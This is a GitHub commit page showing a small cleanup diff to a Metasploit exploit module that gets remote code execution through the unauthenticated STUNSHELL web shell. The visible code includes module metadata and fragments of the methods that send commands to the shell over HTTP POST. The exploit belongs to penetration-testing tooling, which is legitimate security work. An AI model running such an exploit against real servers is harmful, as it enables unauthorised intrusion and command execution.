Skip to content

Commit 9b18eb8

Browse files
author
jvazquez-r7
committed
cleanup for stunshell_exec
1 parent a7a5569 commit 9b18eb8

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

modules/exploits/multi/http/stunshell_exec.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -16,14 +16,14 @@ def initialize(info={})
1616
super(update_info(info,
1717
'Name' => 'STUNSHELL Web Shell Remote Code Execution',
1818
'Description' => %q{
19-
This module exploits unauthenticated versions of the "STUNSHELL" web shell. This
20-
module works when safe mode is disabled on the web server. This shell is widely
21-
used in automated RFI payloads.
19+
This module exploits unauthenticated versions of the "STUNSHELL" web shell.
20+
This module works when safe mode is disabled on the web server. This shell is
21+
widely used in automated RFI payloads.
2222
},
2323
'License' => MSF_LICENSE,
2424
'Author' =>
2525
[
26-
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
26+
'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
2727
],
2828
'References' =>
2929
[
@@ -43,7 +43,7 @@ module works when safe mode is disabled on the web server. This shell is widely
4343
},
4444
'Platform' => ['unix', 'win'],
4545
'Arch' => ARCH_CMD,
46-
'Targets' =>
46+
'Targets' =>
4747
[
4848
['stunshell / Unix', { 'Platform' => 'unix' } ],
4949
['stunshell / Windows', { 'Platform' => 'win' } ]
@@ -58,7 +58,7 @@ module works when safe mode is disabled on the web server. This shell is widely
5858
end
5959

6060
def check
61-
uri = normalize_uri(datastore['URI'])
61+
uri = normalize_uri(target_uri.path.to_s)
6262
request_parameters = {
6363
'method' => 'POST',
6464
'uri' => uri,
@@ -75,7 +75,7 @@ def check
7575
end
7676

7777
def http_send_command(cmd)
78-
uri = normalize_uri(datastore['URI'])
78+
uri = normalize_uri(target_uri.path.to_s)
7979
request_parameters = {
8080
'method' => 'POST',
8181
'uri' => uri,

0 commit comments

Comments
 (0)